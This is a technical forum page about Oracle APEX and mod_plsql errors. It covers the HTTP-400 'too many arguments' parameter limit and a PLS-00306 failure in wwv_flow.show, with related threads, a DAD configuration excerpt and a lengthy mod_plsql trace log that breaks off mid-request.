Mod_plsql: /pls/apex/wwv_flow.accept HTTP-400 Too many arguments passed in.

Hi All ,
I want one solution i have a report which fectches the ppt that r stored in db,If i search more results it errors out so i have reduced the results and it was working fine.Now i see it is giving the same error(as below) althorugh it was working fine by reducing results in query.Can anybody please help me in this.
the error is
Bad Request
Your browser sent a request that this server could not understand.
mod_plsql: /pls/apex/wwv_flow.accept HTTP-400 Too many arguments passed in. Got 3250 parameters. Upper limit is 2000
Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server Server at insightapps.oraclecorp.com Port 80

Section 1.10 of the Oracle HTTP Server mod_plsql User's Guide states the following
The total number of name value pairs that can be passed to a PL/SQL procedure is 2000.
mod_plsql limits the total number of parameters that can be passed to a single procedure to 2000.
mod_plsql limits the size of a single parameter that can be passed to a procedure to 32000 bytes.
It would be helpful to know how each of these apply in the APEX context
Varad

Similar Messages

  • HTTP-400 Too many arguments passed error

    I am getting the following error when using a multiselect list item to select/update data in the tabular form.
    Bad Request
    Your browser sent a request that this server could not understand.
    mod_plsql: /pls/otn/wwv_flow.accept HTTP-400 Too many arguments passed in. Got 2346 parameters. Upper limit is 2000
    Oracle-Application-Server-10g/10.1.2.3.0 Oracle-HTTP-Server Server at apex.oracle.com Port 80
    I have built this prototype application on the Oracle’s hosted apex.oracle.com site.
    The application page has three sections. Section 1 is an HTML region with the multiselect list. Section 2 is an HTML region with 20 text items. Section 3 has the tabular form with 25 columns that are used to update the data. The tabular form pagination values “Number of Row” and “Maximum Row Count” are set to 500.
    Up until now, the multiselect list in the Section 1 was just a simple select list and I never had any issues. I guess the number of arguments passed was low. Per our customer requirement, I had to change the simple select list to a multiselect list. Now, If I select multiple values in the select list, I get the above mentioned error. But, it does not seem to happen all the time. For example, the first time I select 3 values in the multiselect list, the page renders fine, and I am able to enter/save data in the tabular form. Then, I select two other values in the multiselect list, I would get the error.
    I am getting this error on the Oracle’s hosted apex.oracle.com site where my prototype application exists. And, according to the error oracle is using 10g/10.1.2.3.0. Is there any way to circumvent this issue so I can demo my application to the customer using the multiselect list?
    I found several threads on this forum regarding the same error and it seems that there was a bug in the older versions of Oracle Application server. Also, there were discussions about setting the PlsqlMaxParameters.
    Our dev/test/prod environment would be set up using the Oracle Application Server-10g/10.1.3. The question is would we need to add a line to set the PlsqlMaxParameters value in the plsql.conf file? In addition, what is the maximum value that it can be set to?
    Please forgive me for the longwinded description and the question - only way I could describe the situation.
    Thanks,
    DP

    Varad and Sc0tt,
    Thank you both for your responses.
    Varad – Yes, I can/will reduce the amount of data so it does not cause the tabular form to go over the 2000 field limit. If that is not possible, I will at least make the users aware of this issue. Since the same data is used for the other pages in the application, the users might want to keep all the data.
    Sc0tt – thanks for providing the information for your environment and settings. To plan for the future, we will have to set the value to something high also, around 8-10K range, and adjust later if we have to.
    Thank you both, I will mark both of your answers as helpful and the question as being answered.
    DP
    (Have either of you used the jquery datepicker solution? If yes, can you please take a look at my thread: Thread: Jquery Datepicker calendar problem with page scrolling
    Jquery Datepicker calendar problem with page scrolling

  • HTTP-400 Too many arguments passed - Upper Limit is 4000

    Hi,
    I have encountered this problem with Apex 3.0.1 on Oracle 10g and unfortunately I am not able to increase the PlsqlMaxParameters value of 4000 due to business rules. With regards to this and workarounds, I have the following queries:
    1) Can someone suggest possible workarounds for this problem - I am basically presenting the user with a checkbox response and sometimes this may involve over 400 records sometimes - alot I know but users would like to see everything on a single page - no pagination. This is calling the HTTP-400 error - any suggestions for workaround(s) or do I need to rewrite the page with pagination or something else?
    2) Would using APEX_COLLECTIONS assist in breaking down on the number of parameters sent to mod_plsql?
    3) Would increasing the PlsqlMaxParameters to say 10000 cause any performance issues?
    Any other help on this would be much appreciated.
    Thanks.
    Tony.

    Hi,
    It is indeed a valid work around
    http://iadvise.blogspot.com/2008/05/apex-http-400-too-many-arguments-passed.html
    It can have some performance effect.
    But test this for your situation.
    Kind regards,
    Iloon

  • HTTP-400 Too many arguments passed

    Hello There,
    I installed the fresh 10g and applied patchset 2 on it. I get following error:
    HTTP-400 Too many arguments passed upper limit is 2000
    Please help

    Hello Qiang,
    Little more detail for your reference.
    README for 3355915
    MODPLSQL VERSION 9.0.2.6.0A ONE-OFF PATCH
    Date: January 6, 2004
    o What is in this patch?
    -> FIXES FOR:
    Bug#3355915 : BACKPORT BUG#3329645
    Bug#3116388 : TASK: MOD_PLSQL DOES NOT ALLOW PASSING MORE THAN 2000 PARAMETERS
    Bug#3024540 : NON-SUCCESS CODES WITH NO CONTENT SHOULD SERVE OHS ERRORDOCUMENT
    Bug#2023253 : NLS:FILE IS NOT PROPERTY UPLOADED IF IT'S FILENAME CONTAINS 0X5C
    Bug#3329645 : MODPLSQL IS UNABLE TO PASS PARAMETER LESS THAN 32K BYTES
    Bug#3264502 : DOC PATH REQUEST WITH PERPACKAGE AUTH CALL WRONG AUTH FUNCTION
    Bug#2802064 : ORA-01036 ILLEGAL VAR NAME/NUMBER USING VARIABLE NAMED P_ARRAY
    o What version can I apply this patch on?
    -> iAS 9.0.2.x.x

  • Importing app, 404 Not Found, /pls/apex/wwv_flow.accept was not found

    Hello,
    It seems like others on this forum have posted this same question, although I still can't find my solution.
    I'm trying to import an application into Apex, but I end up getting a 404 Not Found error message, with "The requested URL /pls/apex/wwv_flow.accept was not found on this server". I checked the Apache error logs and this is what I see, but can't seem to understand what I need to do:
    [Wed Oct  3 14:26:10 2007] [error] [client 147.18.232.249] [ecid: 1191435955:131.98.31.15:784:0:3056,0] mod_plsql: /pls/apex/wwv_flow.accept
    HTTP-404 ORA-00942: table or view does not exist\nLaura

    Hi Scott,
    I realized what my problem was. It was in the marvel.conf file, contents listed below. Normally we remove the two lines below in bold. When I put them back in, I was able to load my app. Thanks for tipping me off in the right general direction!
    Laura
    mod_plsql DAD Configuration File                        
    Alias /i/ /opt/oracle/product/10.2.0/db_1_apex/apex/images/
    AddType text/xml xbl
    AddType text/x-component htc
       Order deny,allow   
       PlsqlDocumentPath docs   
       AllowOverride None   
       PlsqlDocumentProcedure wwv_flow_file_manager.process_download   
       PlsqlDatabaseConnectString localhost:1521:IPF ServiceNameFormat   
       PlsqlNLSLanguage AMERICAN_AMERICA.AL32UTF8   
       PlsqlAuthenticationMode Basic   
       PlsqlMaxRequestsPerSession 1
       SetHandler pls_handler   
       PlsqlDocumentTablename wwv_flow_file_objects$   
       PlsqlDefaultPage apex    
    <b>   PlsqlDatabaseUsername APEX_PUBLIC_USER
       PlsqlDatabasePassword xxxxxx</b>
       Allow from all

  • Error on /pls/apex/wwv_flow.show HTTP-404 ORA-06550: line 25, c

    Following on from the previous problem I had with Error 33331, we moved the application to a new APEX installation. Everything was fine for 30 mintes until
    we started getting this error :-
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    I've put in tracing in the httpd.conf file at info level and switched on mod_plsql tracing. Everything went fine for another 40 minutes but we're now getting the same errors, the following is one of the mod_plsql trace files.
    I have a hunch caching is at the root of the problem ?
    <5952 ms>[ReqStartTime: 6/Feb/2008:16:13:59]
    <5952 ms>Request ID ReqID:528620_1202314439
    <5953 ms>Connecting to database with connect string : "(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=mohawk)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=htmldb_p.world)))"
    <5975 ms>Doing alter session set nls_language= "AMERICAN" nls_territory= "AMERICA"
    <5975 ms>OpenCursor
    <5976 ms>Altered session to nls_language=AMERICAN nls_territory=AMERICA
    <5976 ms>DeinitCursor
    <5976 ms>OpenCursor
    <5977 ms>Status 1 (rc=0)
    <5977 ms>DeinitCursor
    <5977 ms>OpenCursor
    <5978 ms>DBCharSet is AMERICAN_AMERICA.WE8ISO8859P1, OWAVersion 10.1.2.0.0, 1001020000 (rc=0)
    <5978 ms>DeinitCursor
    <5978 ms>OpenCursor
    <5978 ms>(wpd.c,1765) Logged in as (unknown)
    <5978 ms>(wpx.c,598) Going to select...
    <5978 ms>(wpx.c,652) Have been asked to execute a request
    <5978 ms>(wppa.c,334) Building Arglist based on Parsed Content from WRB
    <5978 ms>(wppa.c,1016) Enter ParseUrlData
    <5978 ms>POST
    <5978 ms>(wpu.c,257) Attempting to read 147 bytes
    <5978 ms>(wpu.c,262) We read 147, had 0, to get 0 bytes
    <5978 ms>[headers begin]
    <5978 ms>[headers end]
    <5978 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=2989139092861589&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=
    <5978 ms>[form_data]
    <5978 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=2989139092861589&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=
    <5978 ms>(wppa.c,1523) indx = 6, entryCnt = 6
    <5978 ms>(wppa.c,1844) Listing distinct actual names:
    <5978 ms>(wppa.c,1846) p_request
    <5978 ms>(wppa.c,1846) p_instance
    <5978 ms>(wppa.c,1846) p_flow_id
    <5978 ms>(wppa.c,1846) p_flow_step_id
    <5978 ms>(wppa.c,1846) p_arg_names
    <5978 ms>(wppa.c,1846) p_arg_values
    <5978 ms>(wppa.c,1848) Listing actuals of array with large entries:
    <5978 ms>(wppa.c,1853) Listing distinct actual names and values:
    <5978 ms>(wppa.c,1885) p_request, type = 0, value (35) = APPLICATION_PROCESS=get_Level23XML
    <5978 ms>(wppa.c,1885) p_instance, type = 0, value (17) = 2989139092861589
    <5978 ms>(wppa.c,1885) p_flow_id, type = 0, value (5) = 1122
    <5978 ms>(wppa.c,1885) p_flow_step_id, type = 0, value (2) = 0
    <5978 ms>(wppa.c,1885) p_arg_names, type = 0, value (15) = TEMPORARY_ITEM
    <5978 ms>(wppa.c,1885) p_arg_values, type = 0, value (1) =
    <5978 ms>(wppa.c,429) Arglist built, 6 unique entries
    <5978 ms>(wpx.c,659) Going to wpprodb_OciDoBlock...
    <5978 ms>(wpd.c,2750) Cache enabled. Gathering cache information.
    <5978 ms>(wpd.c,2768) Language for this request is en-gb
    <5978 ms>(wpd.c,2819) Using user APEX_PUBLIC_USER for caching.
    <5978 ms>cache: Checking for user level hit
    <5979 ms>cache: Cache MISS user - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/073/9629
    <5979 ms>cache: Checking for system level hit
    <5979 ms>cache: Cache MISS system - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/sys/374/2755
    <5979 ms>(wppr.c,460) start working with wwv_flow.show
    <5979 ms>(wppr.c,1164) The CALL block: len=1115, bind_count=14
    declare
    rc__ number;
    start_time__ binary_integer;
    simple_list__ owa_util.vc_arr;
    complex_list__ owa_util.vc_arr;
    begin
    start_time__ := dbms_utility.get_time;
    owa.init_cgi_env(:n__,:nm__,:v__);
    htp.HTBUF_LEN := 63;
    null;
    null;
    simple_list__(1) := 'sys.%';
    simple_list__(2) := 'dbms\_%';
    simple_list__(3) := 'utl\_%';
    simple_list__(4) := 'owa\_%';
    simple_list__(5) := 'owa.%';
    simple_list__(6) := 'htp.%';
    simple_list__(7) := 'htf.%';
    simple_list__(8) := 'wpg_docload.%';
    if ((owa_match.match_pattern('wwv_flow.show', simple_list__, complex_list__, true))) then
    rc__ := 2;
    else
    null;
    null;
    wwv_flow.show(p_request=>:p_request,p_instance=>:p_instance,p_flow_id=>:p_flow_id,p_flow_step_id=>:p_flow_step_id,p_arg_names=>:p_arg_names,p_arg_values=>:p_arg_values);
    if (wpg_docload.is_file_download) then
    rc__ := 1;
    wpg_docload.get_download_file(:doc_info);
    null;
    null;
    null;
    commit;
    else
    rc__ := 0;
    null;
    null;
    null;
    commit;
    owa.get_page(:data__,:ndata__);
    end if;
    end if;
    :rc__ := rc__;
    :db_proc_time__ := dbms_utility.get_time - start_time__;
    end;
    <5979 ms>(wppr.c,520) Pl/sql block parsed...
    <5979 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
    <5979 ms> PLSQL_GATEWAY(14)=(6)WebDb
    <5979 ms> GATEWAY_IVERSION(17)=(2)2
    <5979 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
    <5979 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
    <5979 ms> SERVER_PORT(12)=(5)7777
    <5979 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
    <5979 ms> REQUEST_METHOD(15)=(5)POST
    <5979 ms> PATH_INFO(10)=(15)/wwv_flow.show
    <5979 ms> SCRIPT_NAME(12)=(10)/pls/apex
    <5979 ms> REMOTE_ADDR(12)=(9)10.0.2.0
    <5979 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
    <5979 ms> REQUEST_PROTOCOL(17)=(5)HTTP
    <5979 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
    <5979 ms> HTTP_CONTENT_LENGTH(20)=(4)147
    <5979 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
    <5979 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
    <5979 ms> HTTP_HOST(10)=(12)mohawk:7777
    <5979 ms> HTTP_ACCEPT(12)=(4)*/*
    <5979 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
    <5979 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
    <5979 ms> HTTP_REFERER(13)=(123)http://mohawk:7777/pls/apex/f?p=1122:1:2989139092861589::::F101_CACHED_NTID,P1_STRADNAME,P2_STRADNAME:sw2802,sw2802,sw2802
    <5979 ms> HTTP_ORACLE_ECID(17)=(36)1202314439:10.30.96.8:528620:0:22,0
    <5979 ms> WEB_AUTHENT_PREFIX(19)=(1)
    <5979 ms> DAD_NAME(9)=(5)apex
    <5979 ms> DOC_ACCESS_PATH(16)=(5)docs
    <5979 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
    <5979 ms> PATH_ALIAS(11)=(1)
    <5979 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
    <5979 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
    <5979 ms> SCRIPT_PREFIX(14)=(5)/pls
    <5979 ms>StrArrPosBind pos 2 Charset Id : 873
    <5979 ms>StrArrPosBind pos 3 Charset Id : 873
    <5979 ms>StrArrPosBind pos 11 Charset Id : 873
    <5984 ms>Execute: ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PL/SQL: Statement ignored
    <5984 ms>(wppr.c,640) Execute:declare
    objnum NUMBER;
    objtyp NUMBER;
    prename VARCHAR2(31);
    name VARCHAR(31);
    subname VARCHAR(31);
    dblnk VARCHAR(31);
    begin
    dbms_utility.name_resolve(:objname, 1, prename, name, subname,
    dblnk, objtyp, objnum);
    if (name is null) then
    sys.wpiutl.subpparam(objnum,subname,null,prename,:2,:3,:4,:5,:6,:7);
    else
    sys.wpiutl.subpparam(objnum,name,subname,prename,:2,:3,:4,:5,:6,:7);
    end if;
    exception
    when others then :5 := 1;
    end;
    <5984 ms>(wppr.c,660) 6 parameter names
    <5984 ms>StrArrPosBind pos 2 Charset Id : 873
    <5984 ms>StrArrPosBind pos 3 Charset Id : 873
    <5984 ms>StrArrPosBind pos 4 Charset Id : 873
    <5985 ms>(wppr.c,704) misdefl=0, nenamei=0
    <5985 ms>(wppr.c,744) print list of name, types, typeflags
    <5985 ms>(wppr.c,797) parameter name: P_REQUEST, type: VARCHAR2, typeflags: 000
    <5985 ms>(wppr.c,797) parameter name: P_INSTANCE, type: VARCHAR2, typeflags: 000
    <5985 ms>(wppr.c,797) parameter name: P_FLOW_ID, type: VARCHAR2, typeflags: 000
    <5985 ms>(wppr.c,797) parameter name: P_FLOW_STEP_ID, type: VARCHAR2, typeflags: 000
    <5985 ms>(wppr.c,759) Array graduation (1=>4, 15=>32)
    <5985 ms>(wppr.c,797) parameter name: P_ARG_NAMES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
    <5985 ms>(wppr.c,759) Array graduation (1=>4, 1=>32)
    <5985 ms>(wppr.c,797) parameter name: P_ARG_VALUES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
    <5985 ms>(wppr.c,520) Pl/sql block parsed...
    <5985 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
    <5985 ms> PLSQL_GATEWAY(14)=(6)WebDb
    <5985 ms> GATEWAY_IVERSION(17)=(2)2
    <5985 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
    <5985 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
    <5985 ms> SERVER_PORT(12)=(5)7777
    <5985 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
    <5985 ms> REQUEST_METHOD(15)=(5)POST
    <5985 ms> PATH_INFO(10)=(15)/wwv_flow.show
    <5985 ms> SCRIPT_NAME(12)=(10)/pls/apex
    <5985 ms> REMOTE_ADDR(12)=(9)10.0.2.0
    <5985 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
    <5985 ms> REQUEST_PROTOCOL(17)=(5)HTTP
    <5985 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
    <5985 ms> HTTP_CONTENT_LENGTH(20)=(4)147
    <5985 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
    <5985 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
    <5985 ms> HTTP_HOST(10)=(12)mohawk:7777
    <5985 ms> HTTP_ACCEPT(12)=(4)*/*
    <5985 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
    <5985 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
    <5985 ms> HTTP_REFERER(13)=(123)http://mohawk:7777/pls/apex/f?p=1122:1:2989139092861589::::F101_CACHED_NTID,P1_STRADNAME,P2_STRADNAME:sw2802,sw2802,sw2802
    <5985 ms> HTTP_ORACLE_ECID(17)=(36)1202314439:10.30.96.8:528620:0:22,0
    <5985 ms> WEB_AUTHENT_PREFIX(19)=(1)
    <5985 ms> DAD_NAME(9)=(5)apex
    <5985 ms> DOC_ACCESS_PATH(16)=(5)docs
    <5985 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
    <5985 ms> PATH_ALIAS(11)=(1)
    <5985 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
    <5985 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
    <5985 ms> SCRIPT_PREFIX(14)=(5)/pls
    <5985 ms>StrArrPosBind pos 2 Charset Id : 873
    <5985 ms>StrArrPosBind pos 3 Charset Id : 873
    <5985 ms>StrArrPosBind pos 8 Charset Id : 873
    <5985 ms>StrArrPosBind pos 9 Charset Id : 873
    <5985 ms>StrArrPosBind pos 11 Charset Id : 873
    <5990 ms>ORA-6550 Execute ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PL/SQL: Statement ignored
    <5991 ms>/pls/apex/wwv_flow.show HTTP-404 ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PL/SQL: Statement ignored
    <5991 ms>(wpu.c,595) longjumping back to the beginning
    <5991 ms>(wpu.c,458) cleaning up before longjmp
    <5991 ms>(wpu.c,462) doing a rollback
    <5991 ms>(wpcs.c, 77) Executed 'rollback' (rc=0)
    <5991 ms>(wpcs.c, 77) Executed 'begin dbms_session.reset_package; end;' (rc=0)
    <5991 ms>(wpd.c,1820) Going to close cursor
    <5991 ms>DeinitCursor
    <5991 ms>(wpx.c,693) Shutdown has been called
    <5991 ms>(wpx.c,705) Going to logoff
    <5991 ms>Logoff: Pooling this connection
    <5991 ms>[ReqEndtime: 6/Feb/2008:16:13:59]
    <5991 ms>[ReqExecTime: 39 ms]
    <3240798667 ms>[ReqStartTime: 6/Feb/2008:16:14:06]
    <3240798667 ms>Request ID ReqID:528620_1202314446
    <3240798667 ms>Connecting to database with connect string : "(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=mohawk)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=htmldb_p.world)))"
    <3240798667 ms>OpenCursor
    <3240798667 ms>(wpd.c,1765) Logged in as (unknown)
    <3240798667 ms>(wpx.c,598) Going to select...
    <3240798667 ms>(wpx.c,652) Have been asked to execute a request
    <3240798667 ms>(wppa.c,334) Building Arglist based on Parsed Content from WRB
    <3240798667 ms>(wppa.c,1016) Enter ParseUrlData
    <3240798667 ms>POST
    <3240798667 ms>(wpu.c,257) Attempting to read 147 bytes
    <3240798667 ms>(wpu.c,262) We read 147, had 0, to get 0 bytes
    <3240798667 ms>[headers begin]
    <3240798667 ms>[headers end]
    <3240798667 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=2989139092861589&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=
    <3240798667 ms>[form_data]
    <3240798667 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=2989139092861589&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=
    <3240798667 ms>(wppa.c,1523) indx = 6, entryCnt = 6
    <3240798667 ms>(wppa.c,1844) Listing distinct actual names:
    <3240798667 ms>(wppa.c,1846) p_request
    <3240798667 ms>(wppa.c,1846) p_instance
    <3240798667 ms>(wppa.c,1846) p_flow_id
    <3240798667 ms>(wppa.c,1846) p_flow_step_id
    <3240798667 ms>(wppa.c,1846) p_arg_names
    <3240798667 ms>(wppa.c,1846) p_arg_values
    <3240798668 ms>(wppa.c,1848) Listing actuals of array with large entries:
    <3240798668 ms>(wppa.c,1853) Listing distinct actual names and values:
    <3240798668 ms>(wppa.c,1885) p_request, type = 0, value (35) = APPLICATION_PROCESS=get_Level23XML
    <3240798668 ms>(wppa.c,1885) p_instance, type = 0, value (17) = 2989139092861589
    <3240798668 ms>(wppa.c,1885) p_flow_id, type = 0, value (5) = 1122
    <3240798668 ms>(wppa.c,1885) p_flow_step_id, type = 0, value (2) = 0
    <3240798668 ms>(wppa.c,1885) p_arg_names, type = 0, value (15) = TEMPORARY_ITEM
    <3240798668 ms>(wppa.c,1885) p_arg_values, type = 0, value (1) =
    <3240798668 ms>(wppa.c,429) Arglist built, 6 unique entries
    <3240798668 ms>(wpx.c,659) Going to wpprodb_OciDoBlock...
    <3240798668 ms>(wpd.c,2750) Cache enabled. Gathering cache information.
    <3240798668 ms>(wpd.c,2768) Language for this request is en-gb
    <3240798668 ms>(wpd.c,2819) Using user APEX_PUBLIC_USER for caching.
    <3240798668 ms>cache: Checking for user level hit
    <3240798668 ms>cache: Cache MISS user - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/073/9629
    <3240798668 ms>cache: Checking for system level hit
    <3240798668 ms>cache: Cache MISS system - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/sys/374/2755
    <3240798668 ms>(wppr.c,460) start working with wwv_flow.show
    <3240798668 ms>(wppr.c,1164) The CALL block: len=1115, bind_count=14
    declare
    rc__ number;
    start_time__ binary_integer;
    simple_list__ owa_util.vc_arr;
    complex_list__ owa_util.vc_arr;
    begin
    start_time__ := dbms_utility.get_time;
    owa.init_cgi_env(:n__,:nm__,:v__);
    htp.HTBUF_LEN := 63;
    null;
    null;
    simple_list__(1) := 'sys.%';
    simple_list__(2) := 'dbms\_%';
    simple_list__(3) := 'utl\_%';
    simple_list__(4) := 'owa\_%';
    simple_list__(5) := 'owa.%';
    simple_list__(6) := 'htp.%';
    simple_list__(7) := 'htf.%';
    simple_list__(8) := 'wpg_docload.%';
    if ((owa_match.match_pattern('wwv_flow.show', simple_list__, complex_list__, true))) then
    rc__ := 2;
    else
    null;
    null;
    wwv_flow.show(p_request=>:p_request,p_instance=>:p_instance,p_flow_id=>:p_flow_id,p_flow_step_id=>:p_flow_step_id,p_arg_names=>:p_arg_names,p_arg_values=>:p_arg_values);
    if (wpg_docload.is_file_download) then
    rc__ := 1;
    wpg_docload.get_download_file(:doc_info);
    null;
    null;
    null;
    commit;
    else
    rc__ := 0;
    null;
    null;
    null;
    commit;
    owa.get_page(:data__,:ndata__);
    end if;
    end if;
    :rc__ := rc__;
    :db_proc_time__ := dbms_utility.get_time - start_time__;
    end;
    <3240798668 ms>(wppr.c,520) Pl/sql block parsed...
    <3240798668 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
    <3240798668 ms> PLSQL_GATEWAY(14)=(6)WebDb
    <3240798668 ms> GATEWAY_IVERSION(17)=(2)3
    <3240798668 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
    <3240798668 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
    <3240798668 ms> SERVER_PORT(12)=(5)7777
    <3240798668 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
    <3240798668 ms> REQUEST_METHOD(15)=(5)POST
    <3240798668 ms> PATH_INFO(10)=(15)/wwv_flow.show
    <3240798668 ms> SCRIPT_NAME(12)=(10)/pls/apex
    <3240798668 ms> REMOTE_ADDR(12)=(9)10.0.2.0
    <3240798668 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
    <3240798668 ms> REQUEST_PROTOCOL(17)=(5)HTTP
    <3240798668 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
    <3240798668 ms> HTTP_CONTENT_LENGTH(20)=(4)147
    <3240798668 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
    <3240798668 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
    <3240798668 ms> HTTP_HOST(10)=(12)mohawk:7777
    <3240798668 ms> HTTP_ACCEPT(12)=(4)*/*
    <3240798668 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
    <3240798668 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
    <3240798668 ms> HTTP_REFERER(13)=(123)http://mohawk:7777/pls/apex/f?p=1122:1:2989139092861589::::F101_CACHED_NTID,P1_STRADNAME,P2_STRADNAME:sw2802,sw2802,sw2802
    <3240798668 ms> HTTP_ORACLE_ECID(17)=(36)1202314446:10.30.96.8:528620:0:35,0
    <3240798668 ms> WEB_AUTHENT_PREFIX(19)=(1)
    <3240798668 ms> DAD_NAME(9)=(5)apex
    <3240798668 ms> DOC_ACCESS_PATH(16)=(5)docs
    <3240798668 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
    <3240798668 ms> PATH_ALIAS(11)=(1)
    <3240798668 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
    <3240798668 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
    <3240798668 ms> SCRIPT_PREFIX(14)=(5)/pls
    <3240798668 ms>StrArrPosBind pos 2 Charset Id : 873
    <3240798668 ms>StrArrPosBind pos 3 Charset Id : 873
    <3240798668 ms>StrArrPosBind pos 11 Charset Id : 873
    <3240798673 ms>Execute: ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PLS-00306: wrong number or types of arguments in call to 'SHOW'
    ORA-06550: line 25, column 3:
    PL/SQL: Statement ignored
    <3240798673 ms>(wppr.c,640) Execute:declare
    objnum NUMBER;
    objtyp NUMBER;
    prename VARCHAR2(31);
    name VARCHAR(31);
    subname VARCHAR(31);
    dblnk VARCHAR(31);
    begin
    dbms_utility.name_resolve(:objname, 1, prename, name, subname,
    dblnk, objtyp, objnum);
    if (name is null) then
    sys.wpiutl.subpparam(objnum,subname,null,prename,:2,:3,:4,:5,:6,:7);
    else
    sys.wpiutl.subpparam(objnum,name,subname,prename,:2,:3,:4,:5,:6,:7);
    end if;
    exception
    when others then :5 := 1;
    end;
    <3240798673 ms>(wppr.c,660) 6 parameter names
    <3240798673 ms>StrArrPosBind pos 2 Charset Id : 873
    <3240798673 ms>StrArrPosBind pos 3 Charset Id : 873
    <3240798673 ms>StrArrPosBind pos 4 Charset Id : 873
    <3240798674 ms>(wppr.c,704) misdefl=0, nenamei=0
    <3240798674 ms>(wppr.c,744) print list of name, types, typeflags
    <3240798674 ms>(wppr.c,797) parameter name: P_REQUEST, type: VARCHAR2, typeflags: 000
    <3240798674 ms>(wppr.c,797) parameter name: P_INSTANCE, type: VARCHAR2, typeflags: 000
    <3240798674 ms>(wppr.c,797) parameter name: P_FLOW_ID, type: VARCHAR2, typeflags: 000
    <3240798674 ms>(wppr.c,797) parameter name: P_FLOW_STEP_ID, type: VARCHAR2, typeflags: 000
    <3240798674 ms>(wppr.c,759) Array graduation (1=>4, 15=>32)
    <3240798674 ms>(wppr.c,797) parameter name: P_ARG_NAMES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
    <3240798674 ms>(wppr.c,759) Array graduation (1=>4, 1=>32)
